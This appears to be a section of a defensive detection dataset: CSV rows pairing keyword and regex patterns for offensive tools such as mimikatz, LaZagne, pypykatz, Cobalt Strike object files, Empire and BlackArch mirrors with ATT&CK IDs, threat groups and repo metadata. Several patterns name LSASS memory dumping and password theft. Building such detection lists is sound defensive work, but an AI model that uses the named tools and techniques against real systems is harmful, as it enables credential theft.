"*mimipy.py*",".{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","52071"
"*mimipy_loot_passwords*",".{0,1000}mimipy_loot_passwords.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","0","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","52072"
"*mimiRatz*",".{0,1000}mimiRatz.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","52073"
"*mimishim.*",".{0,1000}mimishim\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52074"
"*mimispool (mimikatz)*",".{0,1000}mimispool\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52075"
"*mimispool for Windows (mimikatz)*",".{0,1000}mimispool\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#description","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52076"
"*mimispool.dll*",".{0,1000}mimispool\.dll.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52077"
"*MimiTickets\*-Tickets.txt*",".{0,1000}MimiTickets\\.{0,1000}\-Tickets\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","52078"
"*minidump*minikerberos*",".{0,1000}minidump.{0,1000}minikerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","52079"
"*minidump.* lsass.dmp*",".{0,1000}minidump\..{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52080"
"*Minidump.exe*",".{0,1000}Minidump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52081"
"*minidump.exe*",".{0,1000}minidump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","52082"
"*minidump.lsakeys*",".{0,1000}minidump\.lsakeys.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52083"
"*Minidump.sln*",".{0,1000}Minidump\.sln.{0,1000}","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","52084"
"*minidump_add_memory_block*",".{0,1000}minidump_add_memory_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","1","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","52085"
"*minidump_add_memory64_block*",".{0,1000}minidump_add_memory64_block.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","1","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","52086"
"*minidumptomemsharp.lsa.lsaproviderduper.boo*",".{0,1000}minidumptomemsharp\.lsa\.lsaproviderduper\.boo.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","52087"
"*MiniDumpWriteDump(hLsass*",".{0,1000}MiniDumpWriteDump\(hLsass.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","52088"
"*MiniDumpWriteDump(lsass*",".{0,1000}MiniDumpWriteDump\(lsass.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","52089"
"*MiniEmpireDLL.dll*",".{0,1000}MiniEmpireDLL\.dll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","52090"
"*minikerberos.zip*",".{0,1000}minikerberos\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","52091"
"*minio.dev.pico.sh*",".{0,1000}minio\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","52094"
"*minio.pico.sh*",".{0,1000}minio\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","52095"
"*mirror.archlinux.tw/BlackArch/*/os/*",".{0,1000}mirror\.archlinux\.tw\/BlackArch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52096"
"*mirror.cedia.org.ec/blackarch/*/os/*",".{0,1000}mirror\.cedia\.org\.ec\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52097"
"*mirror.cyberbits.eu/blackarch/*/os/*",".{0,1000}mirror\.cyberbits\.eu\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52098"
"*mirror.easyname.at/blackarch/*/os/*",".{0,1000}mirror\.easyname\.at\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52099"
"*mirror.easyname.ch/blackarch/*/os/*",".{0,1000}mirror\.easyname\.ch\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52100"
"*mirror.maa.albony.in/blackarch/*/os/*",".{0,1000}mirror\.maa\.albony\.in\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52101"
"*mirror.math.princeton.edu/pub/blackarch/*/os/*",".{0,1000}mirror\.math\.princeton\.edu\/pub\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52102"
"*mirror.serverion.com/blackarch/*/os/*",".{0,1000}mirror\.serverion\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52103"
"*mirror.sg.gs/blackarch/*/os/*",".{0,1000}mirror\.sg\.gs\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52104"
"*mirror.sjtu.edu.cn/blackarch/*/os/*",".{0,1000}mirror\.sjtu\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52105"
"*mirror.team-cymru.com/blackarch/*/os/*",".{0,1000}mirror\.team\-cymru\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52106"
"*mirror.telepoint.bg/blackarch/*/os/*",".{0,1000}mirror\.telepoint\.bg\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52107"
"*mirror.tillo.ch/ftp/blackarch/*/os/*",".{0,1000}mirror\.tillo\.ch\/ftp\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52108"
"*mirror.yandex.ru/mirrors/blackarch/*/os/*",".{0,1000}mirror\.yandex\.ru\/mirrors\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52109"
"*mirror.zetup.net/blackarch/*/os/*",".{0,1000}mirror\.zetup\.net\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52110"
"*mirrordump.py*",".{0,1000}mirrordump\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52111"
"*mirrors.aliyun.com/blackarch/*/os/*",".{0,1000}mirrors\.aliyun\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52112"
"*mirrors.aliyun.com/parrot*",".{0,1000}mirrors\.aliyun\.com\/parrot.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52113"
"*mirrors.cicku.me/blackarch/*/os/*",".{0,1000}mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52114"
"*mirrors.dotsrc.org/blackarch/*/os/*",".{0,1000}mirrors\.dotsrc\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52115"
"*mirrors.gethosted.online/blackarch/blackarch/*/os/*",".{0,1000}mirrors\.gethosted\.online\/blackarch\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52116"
"*mirrors.hostico.ro/blackarch/*/os/*",".{0,1000}mirrors\.hostico\.ro\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52117"
"*mirrors.hust.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.hust\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52118"
"*mirrors.nju.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.nju\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52119"
